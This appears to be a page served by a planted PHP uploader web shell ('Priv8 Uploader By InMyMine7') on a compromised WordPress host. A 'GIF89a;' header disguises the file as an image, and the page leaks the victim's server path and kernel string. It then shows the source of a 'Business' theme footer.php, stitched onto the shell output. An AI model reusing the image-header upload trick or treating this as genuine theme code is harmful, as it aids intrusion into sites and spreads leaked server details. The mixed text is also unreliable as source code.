GIF89a;
Notice: Undefined index: in /home/bs3263/domains/poolq.ee/public_html/wp-content/plugins/classic-editor/classic-editor.php on line 3
Priv8 Uploader By InMyMine7
Linux bs3.beeserver.ee 2.6.32-642.6.2.el6.x86_64 #1 SMP Wed Oct 26 06:52:09 UTC 2016 x86_64
<?php
/**
* Footer template used by Business.
*
* Authors: Tyler Cunningham, Trent Lapinski
* Copyright: © 2012
* {@link http://cyberchimps.com/ CyberChimps LLC}
*
* Released under the terms of the GNU General Public License.
* You should have received a copy of the GNU General Public License,
* along with this software. In the main directory, see: /licensing/
* If not, see: {@link http://www.gnu.org/licenses/}.
*
* @package Business.
* @since 3.0
*/
global $options, $themeslug;
?>
</div>
<?php if ($options->get($themeslug.'_disable_footer') != "0"):?>
<div id="footer">
<div class="container">
<div class="row">
<!-- Begin @business footer hook content-->
<?php business_footer(); ?>
<!-- End @business footer hook content-->
<?php endif;?>
</div><!--end footer_wrap-->
</div><!--end footer-->
</div>
<?php if ($options->get($themeslug.'_disable_afterfooter') != "0"):?>
<div id="afterfooter">
<div id="afterfooterwrap">
<div class="container">
<div class="row">
<!-- Begin @business afterfooter hook content-->
<?php business_secondary_footer(); ?>
<!-- End @business afterfooter hook content-->
</div> <!--end afterfooterwrap-->
</div> <!--end afterfooter-->
</div>
</div>
<?php endif;?>
<?php wp_footer(); ?>
</body>
</html>